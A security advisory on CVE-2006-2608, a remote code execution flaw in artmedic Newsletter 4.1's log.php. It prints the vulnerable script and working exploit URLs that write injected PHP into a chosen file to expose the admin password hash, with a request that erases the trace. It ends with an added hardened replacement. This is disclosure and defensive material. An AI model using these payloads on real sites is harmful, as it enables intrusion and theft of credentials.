Bug: Remote Code Execution in artmedic Newsletter 4.1 [log.php]


Remote Code Execution in artmedic Newsletter 4.1 [log.php]

Published: 2006.05.27
Credit: C.Schmitz
Risk: High
CWE: N/A
CVE: CVE-2006-2608
Local: No
Remote: Yes

CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

I found a bug in artmedic Newsletter 4.1 (probably also in newer versions) which lets an attacker run arbitrary PHP code
and bypass the password protection.

The cause is a design mistake: log.php relies on variables ($logfile, $logtime, $email) that it expects the including
page to have set, and it does nothing to check where they actually came from when the script is requested on its own.

log.php:

<?php

$time = time();
$date = date("d.m.Y, H:i:s");
$remote = getenv("REMOTE_ADDR");
$ip = getHostByAddr($remote);

// $email goes into the record unchanged and $logfile names the file that is
// written. Neither is assigned in this script: both come from the including
// page, or from the request when log.php is called directly.
$logd = "$time"."&&"."$date"."&&"."$remote"."&&"."$ip"."&&"."$email"."&&\n";

$logdaten = fopen("$logfile", "a+");
flock($logdaten,2);
fputs($logdaten, $logd);
flock($logdaten,3);
fclose($logdaten);

// Delete log data older than the retention period ($logtime, in seconds)
$ablaufzeit = "$time"-"$logtime";
$pruefung = @file($logfile);

while (list ($line_num, $line) = @each ($pruefung))
{
    $zeiten = explode("&&",$line);
    if($zeiten[0] <= $ablaufzeit)
    {
        $fp = fopen( "$logfile", "r" );
        $contents = fread($fp, filesize($daten));   // $daten is not defined anywhere in this script
        fclose($fp);
        $line=quotemeta($line);
        $string2 = "";
        $replace = ereg_replace($line, $string2, $contents);
        $fh=fopen($logfile, "w+");
        @flock($fp,2);   // locks the already closed $fp rather than $fh
        fputs($fh, $replace);
        @flock($fp,3);
        fclose($fh);
    }
}

?>

Normally log.php is included by another script, and $logfile, $logtime and $email are declared in that parent document.
Requested directly, the script still runs, and with register_globals enabled (the PHP default at the time) the three
variables are taken from the query string instead. If we run
"log.php?logfile=anyfile.anyext&logtime=unixtimestamp>0&email=<-- insert php code here -->"
we get a file anyfile.anyext (created if it does not exist, appended to if it does, since fopen uses mode a+) with the
following content (logtime must be greater than 0, otherwise the cleanup loop removes the line again right after it is written):

<html>

...

unixtimestamp&&date&&user.host&&user.ip&&<-- php code -->&&

...

</html>

A simple example that reveals the admin password hash is

log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo%20$password%20?>

which writes "<? require($cur); echo $password ?>" into info.php. Then just request info.php?cur=include.php and you will see it.

To remove the entry again, request:

"log.php?logfile=info.php&logtime=000000"

(with logtime=0, $ablaufzeit equals $time, so every line in the file, the injected one included, is treated as expired by the cleanup loop.)
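For comparison, an added example of how the same logger looks when the design mistake is fixed. This is not artmedic's code and not part of the advisory; the constant name NEWSLETTER_LOG_OK, the log path under ../data, the one-week retention and the nl_ function names are all assumptions, and filter_var needs PHP 5.2 or later. The points it demonstrates are the ones the advisory turns on: the script refuses to run unless its parent included it, the file name and retention are fixed server-side instead of being taken from whatever variables happen to exist, the email is validated before it is written, and the append and the expiry rewrite happen under one lock on one handle.

```php
<?php
// Added example (not vendor code): hardened replacement for log.php.

// 1. Refuse direct requests. The including page defines this constant first,
//    so "log.php?logfile=...&email=..." on its own does nothing.
if (!defined('NEWSLETTER_LOG_OK')) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

// 2. File name and retention are fixed here, never read from the request.
//    Keeping the log outside the document root means that even injected
//    content could not be fetched and executed as a script.
define('NL_LOGFILE', dirname(__DIR__) . '/data/newsletter.log');   // assumed path
define('NL_LOGTIME', 7 * 24 * 3600);                               // assumed retention, seconds

// Remove anything that could break the "&&"-delimited, line-based format.
function nl_clean_field($value)
{
    return str_replace(array('&&', "\r", "\n"), '', (string)$value);
}

// 3. Accept only a syntactically valid address. The original wrote $email
//    into the file verbatim, which is how "<? ... ?>" got there.
function nl_clean_email($email)
{
    $email = filter_var($email, FILTER_VALIDATE_EMAIL);
    return $email === false ? null : nl_clean_field($email);
}

// One record in the original layout: time&&date&&addr&&host&&email
function nl_format_record($time, $remote, $host, $email)
{
    return $time . '&&' . date('d.m.Y, H:i:s', $time) . '&&' . nl_clean_field($remote)
         . '&&' . nl_clean_field($host) . '&&' . $email . "\n";
}

// 4. Append the new record and drop expired ones in one pass, under a single
//    exclusive lock, so concurrent requests cannot interleave the two steps.
//    Returns true on success, false if the email was rejected or I/O failed.
function nl_log($email, $now = null)
{
    $now   = ($now === null) ? time() : (int)$now;
    $email = nl_clean_email($email);
    if ($email === null) {
        return false;
    }
    $remote = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '-';
    // A reverse lookup returns attacker-influenced data (their PTR record),
    // so it is cleaned like any other field before it is written.
    $host = ($remote === '-') ? '-' : gethostbyaddr($remote);

    $fh = fopen(NL_LOGFILE, 'c+');         // create if missing, never truncate on open
    if ($fh === false || !flock($fh, LOCK_EX)) {
        return false;
    }
    $kept = array();
    while (($line = fgets($fh)) !== false) {
        $fields = explode('&&', $line, 2);
        if ((int)$fields[0] > $now - NL_LOGTIME) {   // still within retention
            $kept[] = $line;
        }
    }
    $kept[] = nl_format_record($now, $remote, $host, $email);
    ftruncate($fh, 0);
    rewind($fh);
    fwrite($fh, implode('', $kept));
    fflush($fh);
    flock($fh, LOCK_UN);
    fclose($fh);
    return true;
}
```

The parent document would do `define('NEWSLETTER_LOG_OK', true); require 'log.php'; nl_log($email);` and nothing else; an attacker who requests log.php directly gets a 403, and one who submits `<? ... ?>` as the address gets the record rejected by nl_clean_email rather than written to a file of their choosing.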

The vendor has not yet been informed, but will be as soon as possible.

regards

C.Schmitz

Copyright 2014, cxsecurity.com